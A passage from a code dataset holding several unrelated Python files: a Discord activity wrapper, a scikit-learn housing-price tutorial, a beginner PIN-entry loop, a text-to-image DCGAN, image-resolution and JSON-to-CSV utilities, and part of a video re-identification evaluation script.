self.activity = dsdk.Activity()\n self.activity.state = \"Just started\"\n\n # activity icon\n self.activity.assets.large_image = \"https://i.imgur.com/thAl2Ll.png\"\n\n # update the activity\n self.update_discord_status(\"Just Started\")\n\n def on_activity_join(self, join_secret):\n print(\"Activity Joined\")\n\n def on_activity_invite(self, type, user, activity):\n print(\"Activity Invite Received\")\n\n def update_party(self, min, max):\n # party settings\n print(\"party updated\")\n self.activity.party.id = str(uuid.uuid4())\n self.activity.party.size.current_size = min\n self.activity.party.size.max_size = max\n self.activity.secrets.join = str(uuid.uuid4())\n self.activity.timestamps.start = int(time.time())\n self.activity_manager.update_activity(self.activity, lambda result: self.debug_callback(\"update_activity\", result))\n\n def get_portrait(self):\n # handle\n handle = dsdk.ImageHandle()\n handle.type = dsdk.ImageType.user\n handle.id = self.user.id\n handle.size = 256\n\n self.image_manager.fetch(handle, True, self.on_image_loaded)\n\n return self.portrait\n\n def get_username(self):\n return [self.user.username, self.user.discriminator]\n\n def on_current_user_update(self):\n self.user = self.user_manager.get_current_user()\n print(f\"Hello, {self.user.username}#{self.user.discriminator}\")\n\n self.get_portrait()\n\n def on_image_loaded(self, result, handle):\n if result != dsdk.Result.ok:\n print(f\"Failed to fetch the image (result {result})\")\n else:\n print(\"Fetched the image!\")\n print(\"Handle:\", handle.type, handle.id, handle.size)\n\n dimensions = self.image_manager.get_dimensions(handle)\n print(\"Dimensions:\", dimensions.width, dimensions.height)\n\n # we load the image\n data = self.image_manager.get_data(handle)\n im = Image.frombytes(\"RGBA\", (dimensions.width, dimensions.height), data)\n self.portrait = pygame.image.fromstring(im.tobytes(), im.size, im.mode).convert() # type: ignore\n\n def on_activity_join_request(self, user):\n print(f\"{user.username} wants to join you\")\n self.mixer.sound_play('resources/sounds/Join.mp3')\n\n def debug_callback(self, debug, result, *args):\n print(debug, \"success\") if result == dsdk.Result.ok else print(debug, \"failure\", result, args)\n\n def update_discord_status(self, state):\n if self.discord_active:\n self.activity.state = state\n self.activity_manager.update_activity(self.activity, lambda result: self.debug_callback(\"update_activity\", result))\n\n def tick(self):\n # Call required updates\n if self.is_active():\n try:\n self.app.run_callbacks()\n except:\n self.disable()\n\n def is_active(self):\n return self.discord_active\n\n def clear_activity(self):\n self.activity_manager.clear_activity\n\n def disable(self):\n self.discord_active = False","repo_name":"BP-Feral/HotFK","sub_path":"classes/discord.py","file_name":"discord.py","file_ext":"py","file_size_in_byte":4382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"2488168718","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn.compose import TransformedTargetRegressor, ColumnTransformer, make_column_transformer, make_column_selector\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split, StratifiedShuffleSplit, cross_val_score, GridSearchCV\nfrom pandas.plotting import scatter_matrix\nfrom sklearn.pipeline import make_pipeline, Pipeline\nfrom sklearn.preprocessing import OrdinalEncoder, OneHotEncoder, MinMaxScaler, StandardScaler, FunctionTransformer\nfrom sklearn.metrics.pairwise import rbf_kernel\nfrom sklearn.tree import DecisionTreeRegressor\n\nfrom HandsOnMachineLearningProjects.A2_CustomTransformers.ClusterSimilarity import ClusterSimilarity\n\n\ndef column_ratio(x):\n return x[:, [0]] / x[:, [1]]\n\n\ndef ratio_name(function_transformer, feature_names_in):\n return ['ratio']\n\n\ndef ratio_pipeline():\n return make_pipeline(\n SimpleImputer(strategy='median'),\n FunctionTransformer(column_ratio, feature_names_out=ratio_name),\n StandardScaler()\n )\n\n\nif __name__ == '__main__':\n original_housing = pd.read_csv('../files/housing/housing.csv')\n housing = original_housing.copy()\n print(housing.describe())\n\n housing.hist(bins=50, figsize=(12, 8))\n plt.show()\n\n housing['income_cat'] = pd.cut(housing['median_income'], bins=[0, 1.5, 3.0, 4.5, 6., np.inf],\n labels=[1, 2, 3, 4, 5])\n housing['income_cat'].value_counts().sort_index().plot.bar(rot=0, grid=True)\n plt.xlabel('Income Category')\n plt.ylabel('Number Of Districts')\n # plt.show()\n\n splitter = StratifiedShuffleSplit(n_splits=10, test_size=0.2, random_state=42)\n strata_splits = []\n\n for train_index, test_index in splitter.split(housing, housing['income_cat']):\n strata_train_set_n = housing.iloc[train_index]\n strata_test_set_n = housing.iloc[test_index]\n strata_splits.append([strata_train_set_n, strata_test_set_n])\n\n strata_train_set, strata_test_set = train_test_split(housing, test_size=0.2, stratify=housing['income_cat'],\n random_state=42)\n\n print(strata_test_set['income_cat'].value_counts() / len(strata_test_set))\n\n for set_ in (strata_train_set, strata_test_set):\n set_.drop('income_cat', axis=1, inplace=True)\n\n housing = pd.DataFrame(strata_train_set.copy())\n\n housing.plot(kind='scatter', x='longitude', y='latitude', s=housing['population'] / 100,\n cmap='jet', label='population', colorbar=True, c='median_house_value', sharex=False\n , figsize=(10, 7))\n plt.show()\n\n # we get correlation matrix to know how attributes correlates with median_housing_value\n # (we correlate with median_house_value because we want to predict if sth is a good investment\n # so, the more valuable attribute is median_house_value)#\n corr_matrix = housing.corr()\n median_house_value_correlations = corr_matrix['median_house_value']\n print(median_house_value_correlations)\n\n best_correlation_attributes = ['median_house_value', 'median_income', 'total_rooms', 'housing_median_age']\n scatter_matrix(housing[best_correlation_attributes], figsize=(20, 10), grid=True)\n plt.show()\n\n housing.plot(kind='scatter', x='median_income', y='median_house_value')\n # plt.show()\n\n # now we are going to clean data, so, first we can want to know how many rooms per house are\n housing['rooms_per_house'] = housing['total_rooms'] / housing['households']\n\n # or know the number of bedrooms per room\n housing['bedroom_per_room'] = housing['total_bedrooms'] / housing['total_rooms']\n\n # or know how many people live in each house\n housing['people_per_household'] = housing['population'] / housing['households']\n\n # we get the correlations again to know if attributes calculated recently means something\n corr_matrix = housing.corr()\n median_house_value_correlations = corr_matrix['median_house_value']\n print(median_house_value_correlations.sort_values(ascending=False))\n\n best_correlation_attributes = ['median_house_value', 'median_income', 'housing_median_age',\n 'rooms_per_house', 'bedroom_per_room']\n scatter_matrix(housing[best_correlation_attributes], figsize=(20, 10), grid=True)\n # plt.show()\n\n # start cleaning, first we are going to separate train data and predict data(in our case median_house_value) so...\n housing = pd.DataFrame(strata_train_set.drop(['median_house_value'], axis=1))\n housing_labeled = strata_train_set['median_house_value'].copy()\n\n # we fill nan values with median\n simple_inputer = SimpleImputer(strategy='median')\n housing_num = housing.select_dtypes(include=[np.number])\n simple_inputer.fit(housing_num)\n\n print('median_values = ', simple_inputer.statistics_, housing_num.index)\n\n new_housing = pd.DataFrame(simple_inputer.transform(housing_num), columns=housing_num.columns.values)\n print(new_housing.info())\n\n # clean categorical attributes(we use ordinal encoder to set one number such as 1,2,3... to category types)\n housing_cat = housing[['ocean_proximity']]\n # ordinal_encoder = OrdinalEncoder()\n # housing_cat_encoded = ordinal_encoder.fit_transform(housing_cat)\n # to use ordinal Encoder Variables must have a correlation between them, so ,\n # we will use oneHotEncoder(to encoder variables in dummies)\n\n one_hot_encoder = OneHotEncoder()\n housing_cat_1hot = one_hot_encoder.fit_transform(housing_cat)\n print(housing_cat_1hot.toarray()[:8])\n print('We Can Get Categories Encoded From OneHotEncoder -> ', one_hot_encoder.categories_[0])\n print(len(new_housing), len(housing_cat_1hot.toarray()))\n ocean_proximity_df = pd.DataFrame(housing_cat_1hot.toarray(), columns=one_hot_encoder.get_feature_names_out())\n print(ocean_proximity_df.info())\n new_housing_with_dummies = pd.concat([new_housing, ocean_proximity_df], axis=1)\n\n min_max_scaler = MinMaxScaler(feature_range=(-1, 1))\n housing_with_min_max_scaler = min_max_scaler.fit_transform(new_housing_with_dummies)\n print(housing_with_min_max_scaler)\n print()\n standard_scaler = StandardScaler()\n housing_with_standard_scaler = standard_scaler.fit_transform(new_housing_with_dummies)\n print(housing_with_standard_scaler)\n\n ages = np.linspace(new_housing_with_dummies[\"housing_median_age\"].min(),\n new_housing_with_dummies[\"housing_median_age\"].max(),\n 500).reshape(-1, 1)\n\n # now we use rbf_kernel to use radial_basis_function to cut ages in a group in a range of age 35\n age_simil_35 = rbf_kernel(ages, [[35]], gamma=0.1)\n\n fig, ax1 = plt.subplots()\n\n ax1.set_xlabel(\"Housing median age\")\n ax1.set_ylabel(\"Number of districts\")\n ax1.hist(housing[\"housing_median_age\"], bins=50)\n ax2 = ax1.twinx() # create a twin axis that shares the same x-axis\n color = \"blue\"\n ax2.plot(ages, age_simil_35, color=color, label=\"gamma = 0.10\")\n ax2.tick_params(axis='y', labelcolor=color)\n ax2.set_ylabel(\"Age similarity\", color=color)\n\n plt.legend(loc=\"upper left\")\n plt.show()\n\n df_with_ages_between_30_and_40 = pd.DataFrame(strata_train_set.loc[\n (strata_train_set['housing_median_age'] >= 30) & (\n strata_train_set['housing_median_age'] <= 40)])\n\n df_with_ages_between_30_and_40 = df_with_ages_between_30_and_40.reset_index()\n df_with_ages_between_30_and_40.drop('index', axis=1, inplace=True)\n housing_median_age = df_with_ages_between_30_and_40['housing_median_age']\n prices = df_with_ages_between_30_and_40['median_house_value']\n\n order = np.lexsort([prices, housing_median_age])\n plt.scatter(housing_median_age[order], prices[order])\n # plt.show()\n\n # we can use TransformedTargetRegressor to use a linear regression and scaler in the same fit\n some_new_data = housing[['median_income']].iloc[:5]\n model = TransformedTargetRegressor(LinearRegression(), transformer=StandardScaler())\n model.fit(housing[['median_income']], housing_labeled)\n predictions = model.predict(some_new_data)\n\n print(predictions)\n\n # now we use a transformer to transform data into logarithms,\n # and if you use inverse_transform you get the exponential\n log_transformer = FunctionTransformer(np.log, inverse_func=np.exp)\n log_pop = log_transformer.transform(housing[['population']])\n\n # also we can use Function Transformer to use the radial basis function mentioned before\n rbf_transformer = FunctionTransformer(rbf_kernel, kw_args=dict(Y=[[35]], gamma=0.1))\n age_simil_35_transformer = rbf_transformer.transform(ages)\n # print(age_simil_35[:10], age_simil_35_transformer[0:10])\n\n # use radial basis function with 2D array,\n # in this case this method will do the euclidian measure between the two variable\n sf_coords = 37.7749, -122.41\n rbf_transformer = FunctionTransformer(rbf_kernel, kw_args=dict(Y=[sf_coords], gamma=0.1))\n sf_simil = rbf_transformer.transform(housing[['latitude', 'longitude']])\n\n # use multiple functions\n array = np.array([[1, 2], [3, 4]])\n rbf_transformer = FunctionTransformer(lambda x: x[:, [0]] / x[:, [1]])\n\n print(rbf_transformer.transform(array))\n\n # we use SimpleImputer to fill null values with median, and after that we scale values\n num_pipeline = make_pipeline(\n SimpleImputer(strategy='median'),\n StandardScaler()\n )\n\n # if we have to encoder categorical values we will fill nun values with the most frequent\n # and after that we use oneHotEncoder to transform in dummies\n categorical_pipeline = make_pipeline(\n SimpleImputer(strategy='most_frequent'),\n OneHotEncoder()\n )\n\n preprocessing = make_column_transformer(\n (num_pipeline, make_column_selector(dtype_include=np.number)),\n (categorical_pipeline, make_column_selector(dtype_include='object'))\n )\n\n housing_with_make_column_array = preprocessing.fit_transform(original_housing)\n name_columns = list(map(lambda x: x.split('__')[1], preprocessing.get_feature_names_out()))\n housing_with_make_column = pd.DataFrame(housing_with_make_column_array, columns=name_columns)\n\n log_pipeline = make_pipeline(\n SimpleImputer(strategy='median'),\n FunctionTransformer(np.log, feature_names_out='one-to-one'),\n StandardScaler()\n )\n\n cluster_simil = ClusterSimilarity(n_clusters=10, gamma=1, random_state=42)\n\n default_num_pipeline = make_pipeline(SimpleImputer(strategy='median'), StandardScaler())\n\n preprocessing = ColumnTransformer([\n (\"bedrooms\", ratio_pipeline(), [\"total_bedrooms\", \"total_rooms\"]),\n (\"rooms_per_house\", ratio_pipeline(), [\"total_rooms\", \"households\"]),\n (\"people_per_house\", ratio_pipeline(), [\"population\", \"households\"]),\n (\"log\", log_pipeline, [\"total_bedrooms\", \"total_rooms\", \"population\",\n \"households\", \"median_income\"]),\n (\"geo\", cluster_simil, [\"latitude\", \"longitude\"]),\n (\"cat\", categorical_pipeline, make_column_selector(dtype_include=object)),\n ], remainder=default_num_pipeline)\n\n housing_preprocessed = pd.DataFrame(preprocessing.fit_transform(housing),\n columns=preprocessing.get_feature_names_out())\n\n lin_reg = make_pipeline(preprocessing, LinearRegression())\n lin_reg.fit(housing, housing_labeled)\n predictions = lin_reg.predict(housing)\n\n print(predictions[:5].round(2), '\\n', housing_labeled[:5].values.round(2))\n\n # model determination\n lin_rmse = mean_squared_error(housing_labeled, predictions, squared=False)\n print(lin_rmse)\n\n tree_reg = make_pipeline(preprocessing, DecisionTreeRegressor())\n tree_reg.fit(housing, housing_labeled)\n predictions = tree_reg.predict(housing)\n\n # model determination\n tree_rmse = mean_squared_error(housing_labeled, predictions, squared=False)\n print(11, tree_rmse) # this produces an overfitting (its remember data used when we trained the model )\n\n # we use this method to create 10 folds to validate the model and compare 9 to 1 with each fold\n tree_rmses = -cross_val_score(tree_reg, housing, housing_labeled, scoring='neg_root_mean_squared_error', cv=10)\n\n print('model determination Decission tree regressor', tree_rmses)\n\n forest_reg = make_pipeline(preprocessing, RandomForestRegressor(random_state=42))\n\n forest_rmses = -cross_val_score(forest_reg, housing, housing_labeled, scoring='neg_root_mean_squared_error', cv=10)\n print('model determination Forest regressor', pd.Series(forest_rmses).describe())\n\n forest_reg.fit(housing, housing_labeled)\n housing_predictions = forest_reg.predict(housing)\n forest_rmse = mean_squared_error(housing_labeled, housing_predictions,\n squared=False)\n\n print('Model error ', forest_rmse)\n\n full_pipeline = Pipeline([\n ('preprocessing', preprocessing),\n ('random_forest', RandomForestRegressor)\n ])\n\n param_grid = [\n {'preprocessing__geo__n_clusters': [5, 8, 10],\n 'random_forest__max_features': [4, 6, 8]},\n {'preprocessing__geo__n_clusters': [10, 15],\n 'random_forest__max_features': [6, 8, 10]},\n ]\n\n grid_search = GridSearchCV(full_pipeline, param_grid, cv=3, scoring='root_mean_squared_error')\n grid_search.fit(housing, housing_labeled)\n\n print(grid_search.best_params_)\n\n\n","repo_name":"RubenBBlazquez/MachineLearningBasicProjects","sub_path":"HandsOnMachineLearningProjects/Linear/PredictHousingInvestment.py","file_name":"PredictHousingInvestment.py","file_ext":"py","file_size_in_byte":13747,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"82"} +{"seq_id":"34998365543","text":"#EJERCICIO 7\n#Escribir un programa que almacene la cadena de caracteres contraseña en una \n#variable, pregunte al usuario por la contraseña hasta que introduzca la contraseña \n#correcta.\n\ncontra= 1234\ncontra_pedida=int(input(\"Ingresa una contrase–a PIN: \"))\npin_correcto=False;\n\nwhile (not pin_correcto):\n if contra==contra_pedida:\n pin_correcto=True\n print(\"Contrase–a correcta, bienvenid@\")\n else:\n print(\"Contrase–a incorrecta\")\n contra_pedida=int(input(\"Ingresa una contrase–a PIN: \"))","repo_name":"alvaromartinsalazar/IAW","sub_path":"Python/Ejercicios_Bucles/ejercicio7.py","file_name":"ejercicio7.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"19544684167","text":"from keras.models import Model, Sequential\nfrom keras.layers import Input, Dense, Reshape, concatenate\nfrom keras.layers.core import Activation, Flatten\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.convolutional import UpSampling2D, Conv2D, MaxPooling2D\nfrom keras.optimizers import SGD\nfrom keras import backend as K\nimport numpy as np\nfrom PIL import Image\nimport os\nfrom ops import imageProcess \n\nfrom GLOVEModel import GLOVEModel\n\nclass DCGan(object):\n modelName = 'dc-gan'\n \n def __init__(self):\n K.set_image_dim_ordering('tf')\n self.generator = None\n self.discriminator = None\n self.model = None\n\n self.imgWidth = 7\n self.imgHeight = 7\n self.imgChannels = 1\n self.randomInputDim = 50\n self.textInputDim = 100\n \n self.word2vecModel = GLOVEModel(self.textInputDim)\n\n self.config = None\n\n @staticmethod\n def getConfigFilePath(modelDirPath):\n return os.path.join(modelDirPath, DCGan.modelName + '-config.npy')\n\n @staticmethod\n def getWeightFilePath(modelDirPath, modelType):\n return os.path.join(modelDirPath, DCGan.modelName + '-' + modelType + '-weights.h5')\n\n def createGenerator(self,randomInput,textInput):\n initImgWidth = self.imgWidth // 16\n initImgHeight = self.imgHeight // 16\n\n randomOutput = Dense(256)(randomInput)\n textOutput = Dense(512)(textInput)\n\n randomOutput1 = Dense(512)(randomOutput)\n textOutput1 = Dense(1024)(textOutput)\n\n randomOutput2 = Dense(1024)(randomOutput1)\n textOutput2 = Dense(2048)(textOutput1)\n\n totalInput = concatenate([textOutput1,randomOutput1])\n layer1 = Activation('tanh')(totalInput)\n\n layer2 = Dense(128 * initImgWidth * initImgHeight)(layer1)\n layer2 = BatchNormalization()(layer2)\n layer2 = Activation('tanh')(layer2)\n layer2 = Reshape((initImgWidth,initImgHeight,128),input_shape = (128 * initImgWidth * initImgHeight,))(layer2)\n\n layer3 = UpSampling2D(size = (2,2))(layer2)\n layer3 = Conv2D(64,kernel_size = 5,padding='same')(layer3)\n layer3 = Activation('tanh')(layer3)\n\n layer4 = UpSampling2D(size = (2,2))(layer3)\n layer4 = Conv2D(32,kernel_size = 5,padding='same')(layer4)\n layer4 = Activation('tanh')(layer4)\n\n layer5 = UpSampling2D(size = (2,2))(layer4)\n layer5 = Conv2D(16,kernel_size = 5,padding='same')(layer5)\n layer5 = Activation('tanh')(layer5)\n\n layer6 = UpSampling2D(size = (2,2))(layer5)\n layer6 = Conv2D(self.imgChannels,kernel_size = 5,padding='same')(layer6)\n output = Activation('tanh')(layer6)\n\n self.generator = Model([randomInput,textInput],output)\n self.generator.compile(loss='mean_squared_error',optimizer='SGD')\n\n print('generator ', self.generator.summary())\n\n def createDiscrimminator(self,textInput,imgInput):\n textOutput = Dense(1024)(textInput)\n\n layer1 = Conv2D(64,kernel_size = 5,padding = 'same')(imgInput)\n layer1 = Activation('tanh')(layer1)\n\n layer2 = MaxPooling2D(pool_size = (2,2))(layer1)\n\n layer3 = Conv2D(128,kernel_size = 5)(layer2)\n layer3 = Activation('tanh')(layer3)\n\n layer4 = MaxPooling2D(pool_size = (2,2))(layer3)\n\n layer5 = Flatten()(layer4)\n imgOutput = Dense(1024)(layer5)\n\n totalInput = concatenate([imgOutput,textOutput])\n\n layer6 = Activation('tanh')(totalInput)\n layer6 = Dense(1)(layer6)\n\n output = Activation('sigmoid')(layer6)\n\n self.discriminator = Model([imgInput,textInput],output)\n d_optim = SGD(lr=0.0005, momentum=0.5, nesterov=True)\n self.discriminator.compile(loss='binary_crossentropy', optimizer=d_optim)\n\n print('discriminator: ', self.discriminator.summary())\n\n def createModel(self):\n generatorTextInput = Input(shape = (self.textInputDim,))\n generatorRandomInput = Input(shape = (self.randomInputDim,))\n\n discriminatorTextInput = Input(shape = (self.textInputDim,))\n discriminatorImageInput = Input(shape = (self.imgWidth, self.imgHeight,self.imgChannels))\n\n self.createGenerator(generatorRandomInput,generatorTextInput)\n self.createDiscrimminator(discriminatorTextInput,discriminatorImageInput)\n \n output = self.discriminator([self.generator.output,generatorTextInput])\n\n self.model = Model([generatorRandomInput, generatorTextInput], output)\n self.discriminator.trainable = False\n\n g_optim = SGD(lr=0.0005, momentum=0.5, nesterov=True)\n self.model.compile(loss='binary_crossentropy', optimizer=g_optim)\n\n print('generator-discriminator: ', self.model.summary())\n\n def buildModel(self):\n self.createModel()\n\n def loadModel(self, modelDirPath):\n configFilePath = DCGan.getConfigFilePath(modelDirPath)\n self.config = np.load(configFilePath).item()\n self.imgWidth = self.config['imgWidth']\n self.imgHeight = self.config['imgHeight']\n self.imgChannels = self.config['imgChannels']\n self.randomInputDim = self.config['randomInputDim']\n self.textInputDim = self.config['textInputDim']\n\n self.buildModel()\n self.word2vecModel = GLOVEModel(self.textInputDim)\n self.generator.load_weights(DCGan.getWeightFilePath(modelDirPath,'generator'))\n self.discriminator.load_weights(DCGan.getWeightFilePath(modelDirPath, 'discriminator'))\n self.word2vecModel.build()\n\n def fit(self,modelDirPath,data,epochs = None, batchSize = None,snapshotDirPath = None, snapshotInterval = None):\n \n if (epochs == None):\n epochs = 100\n\n if (batchSize == None):\n batchSize = 128\n\n if (snapshotInterval == None):\n snapshotInterval = 20\n\n self.config = dict()\n self.config['imgWidth'] = self.imgWidth\n self.config['imgHeight'] = self.imgHeight\n self.config['randomInputDim'] = self.randomInputDim\n self.config['textInputDim'] = self.textInputDim\n self.config['imgChannels'] = self.imgChannels\n \n self.word2vecModel = GLOVEModel(self.textInputDim)\n self.word2vecModel.build()\n\n configFilePath = DCGan.getConfigFilePath(modelDirPath)\n\n np.save(configFilePath,self.config)\n \n randomBatch = np.zeros((batchSize,self.randomInputDim))\n textBatch = np.zeros((batchSize, self.textInputDim))\n\n self.buildModel()\n\n for epoch in range(epochs):\n batchCount = int(data.shape[0] / batchSize)\n\n for batchIndex in range(batchCount):\n dataBatch = data[batchIndex * batchSize:(batchIndex + 1) * batchSize]\n\n imageBatch = []\n for index in range(batchSize):\n dataUnit = dataBatch[index]\n\n img = dataUnit[0]\n text = dataUnit[1]\n\n imageBatch.append(img)\n\n textBatch[index, :] = self.word2vecModel.encode(text)\n randomBatch[index, :] = np.random.uniform(-1, 1, self.randomInputDim)\n\n imageBatch = np.array(imageBatch)\n\n generatedImages = self.generator.predict([randomBatch, textBatch], verbose=0)\n\n if (epoch * batchSize + batchIndex) % snapshotInterval == 0:\n self.saveSnapshots(generatedImages,snapshotDirPath,epoch,batchIndex)\n\n self.discriminator.trainable = True\n d_loss = self.discriminator.train_on_batch([np.concatenate((imageBatch, generatedImages)),\n np.concatenate((textBatch, textBatch))],\n np.array([1] * batchSize + [0] * batchSize))\n\n print(\"Epoch %d batch %d d_loss : %f\" % (epoch, batchIndex, d_loss))\n\n for index in range(batchSize):\n randomBatch[index, :] = np.random.uniform(-1, 1, self.randomInputDim)\n\n self.discriminator.trainable = False\n g_loss = self.model.train_on_batch([randomBatch, textBatch], np.array([1] * batchSize))\n\n print(\"Epoch %d batch %d g_loss : %f\" % (epoch, batchIndex, g_loss))\n\n self.generator.save_weights(DCGan.getWeightFilePath(modelDirPath, 'generator'), True)\n self.discriminator.save_weights(DCGan.getWeightFilePath(modelDirPath, 'discriminator'), True)\n\n def generateImage(self, text):\n randomInput = np.zeros(shape=(1, self.randomInputDim))\n textInput = np.zeros(shape=(1, self.textInputDim))\n\n randomInput[0, :] = np.random.uniform(-1, 1, self.randomInputDim)\n textInput[0, :] = self.word2vecModel.encode(text)\n\n image = self.generator.predict([randomInput, textInput], verbose=0)\n\n image = image[0]\n image = image * 127.5 + 127.5\n\n return Image.fromarray(image.astype(np.uint8))\n\n def saveSnapshots(self, generated_images, snapshot_dir_path, epoch, batch_index):\n image = imageProcess.imageMerge(generated_images)\n\n imageProcess.UndoNormalizedImg(image).save(\n os.path.join(snapshot_dir_path, DCGan.modelName + '-' + str(epoch) + \"-\" + str(batch_index) + \".png\"))","repo_name":"happyMH/MK","sub_path":"ganModel1.py","file_name":"ganModel1.py","file_ext":"py","file_size_in_byte":9316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"16272638103","text":"import numpy as np\r\nfrom PIL import Image\r\n\r\n\r\ndef spatial_resolution():\r\n img = Image.open(\"img/lena.tif\")\r\n out = img.resize((int(img.size[0] / 2), int(img.size[1] / 2)), Image.Resampling.LANCZOS)\r\n out.save(f\"img/lena{out.size[0]}x{out.size[1]}.tif\")\r\n out = img.resize((int(img.size[0] / 4), int(img.size[1] / 4)), Image.Resampling.LANCZOS)\r\n out.save(f\"img/lena{out.size[0]}x{out.size[1]}.tif\")\r\n out = img.resize((int(img.size[0] / 8), int(img.size[1] / 8)), Image.Resampling.LANCZOS)\r\n out.save(f\"img/lena{out.size[0]}x{out.size[1]}.tif\")\r\n\r\n\r\ndef gray_resolution():\r\n img = Image.open(\"img/lena.tif\")\r\n img_array = np.array(img)\r\n out_array = img_array >> 2\r\n out = Image.fromarray(out_array)\r\n out.save(f\"img/lena_0-127.tif\")\r\n out_array = img_array >> 3\r\n out = Image.fromarray(out_array)\r\n out.save(f\"img/lena_0-63.tif\")\r\n out_array = img_array >> 4\r\n out = Image.fromarray(out_array)\r\n out.save(f\"img/lena_0-31.tif\")\r\n\r\n\r\nif __name__ == '__main__':\r\n spatial_resolution()\r\n gray_resolution()\r\n","repo_name":"Mecheal-helloworld/Image-Analysis","sub_path":"ResolutionRatio.py","file_name":"ResolutionRatio.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"20239293100","text":"# @Author: Joey Teng \n# @Date: 19-Nov-2017\n# @Email: joey.teng.dev@gmail.com\n# @Filename: json2csv.py\n# @Last modified by: Toujour\n# @Last modified time: 19-Nov-2017\n\n\nimport json\nimport sys\n\nimport numpy\n\n\ndef CSV(matrix, filename):\n file = open(filename, 'w')\n for i in matrix:\n for j in i:\n file.write('{0},'.format(j))\n file.write('\\n')\n\n\ndef loadCSV2(filename):\n return numpy.array(list(map(lambda x: tuple(map(float, x.split(','))), open(filename, 'r').read().split('\\n')))).transpose().tolist()\n\n\nif __name__ == '__main__':\n CSV(loadCSV2(sys.argv[1]), sys.argv[2])\n","repo_name":"JoeyTeng/HiMCM-2017","sub_path":"json2csv.py","file_name":"json2csv.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"11812787487","text":"from __future__ import print_function, absolute_import\nimport os\nimport gc\nimport sys\nimport time\nimport math\nimport h5py\nimport scipy\nimport datetime\nimport argparse\nimport os.path as osp\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\nfrom torch.optim import lr_scheduler\n\nimport data_manager\nfrom video_loader import VideoDataset\nimport transforms.spatial_transforms as ST\nimport transforms.temporal_transforms as TT\nimport models\n\nfrom utils import AverageMeter, Logger, save_checkpoint\nfrom eval_metrics import evaluate\n\n\ndef extract(model, args, vids, use_gpu):\n n, c, t, h, w = vids.size()\n assert(n == 1)\n k = args.test_frames\n\n if t % k != 0:\n inputs = vids.clone()\n while(inputs.size(2) % k != 0):\n for idx in range(t):\n if (inputs.size(2) % k == 0):\n break\n inputs = torch.cat((inputs, vids[:,:,idx:idx+1]), 2)\n vids = inputs\n t = vids.size(2)\n assert (t % k == 0)\n\n vids = vids.view(c, t//k, k, h, w).contiguous()\n vids = vids.transpose(0, 1) #[t//k, c, k, h, w]\n vids = vids.cuda()\n\n num_clips = vids.size(0)\n batch_size = 32\n feat = torch.cuda.FloatTensor()\n for i in range(int(math.ceil(num_clips * 1.0 / batch_size))):\n clip = vids[i*batch_size: (i+1)*batch_size] #[batch_size, c, k, h, w]\n output = model(clip) #[batch_size, k/1, c]\n output = output.view(-1, output.size(-1)) #[batch_size*k, c]\n feat = torch.cat((feat, output), 0)\n\n feat = feat.mean(0, keepdim=True)\n feat = model.module.bn(feat)\n\n return feat\n\ndef evaluation(model, args, queryloader, galleryloader, use_gpu, ranks=[1, 5, 10, 20]):\n since = time.time()\n model.eval()\n\n qf, q_pids, q_camids = [], [], []\n for batch_idx, (vids, pids, camids) in enumerate(queryloader):\n if (batch_idx + 1) % 1000==0:\n print(\"{}/{}\".format(batch_idx+1, len(queryloader)))\n\n qf.append(extract(model, args, vids, use_gpu).squeeze())\n q_pids.extend(pids)\n q_camids.extend(camids)\n\n qf = torch.stack(qf)\n q_pids = np.asarray(q_pids)\n q_camids = np.asarray(q_camids)\n print(\"Extracted features for query set, obtained {} matrix\".format(qf.shape))\n\n gf, g_pids, g_camids = [], [], []\n for batch_idx, (vids, pids, camids) in enumerate(galleryloader):\n if (batch_idx + 1) % 1000==0:\n print(\"{}/{}\".format(batch_idx+1, len(galleryloader)))\n\n gf.append(extract(model, args, vids, use_gpu).squeeze())\n g_pids.extend(pids)\n g_camids.extend(camids)\n\n gf = torch.stack(gf)\n g_pids = np.asarray(g_pids)\n g_camids = np.asarray(g_camids)\n\n if args.dataset == 'mars' or args.dataset == 'lsvid':\n print('process the dataset {}!'.format(args.dataset))\n # gallery set must contain query set, otherwise 140 query imgs will not have ground truth.\n gf = torch.cat((qf, gf), 0)\n g_pids = np.append(q_pids, g_pids)\n g_camids = np.append(q_camids, g_camids)\n\n print(\"Extracted features for gallery set, obtained {} matrix\".format(gf.shape))\n\n time_elapsed = time.time() - since\n print('Extracting features complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))\n\n print(\"Computing distance matrix\")\n m, n = qf.size(0), gf.size(0)\n distmat = torch.zeros((m,n))\n\n if args.distance == 'euclidean':\n distmat = torch.pow(qf, 2).sum(dim=1, keepdim=True).expand(m, n) + \\\n torch.pow(gf, 2).sum(dim=1, keepdim=True).expand(n, m).t()\n distmat.addmm_(1, -2, qf, gf.t())\n else:\n q_norm = torch.norm(qf, p=2, dim=1, keepdim=True)\n g_norm = torch.norm(gf, p=2, dim=1, keepdim=True)\n qf = qf.div(q_norm.expand_as(qf))\n gf = gf.div(g_norm.expand_as(gf))\n distmat = - torch.mm(qf, gf.t())\n distmat = distmat.data.cpu()\n distmat = distmat.numpy()\n\n print(\"Computing CMC and mAP\")\n cmc, mAP = evaluate(distmat, q_pids, g_pids, q_camids, g_camids)\n\n print(\"Results ----------\")\n print(\"mAP: {:.2%}\".format(mAP))\n print(\"CMC curve\")\n for r in ranks:\n print(\"Rank-{:<3}: {:.2%}\".format(r, cmc[r-1]))\n print(\"------------------\")\n\n elapsed = round(time.time() - since)\n 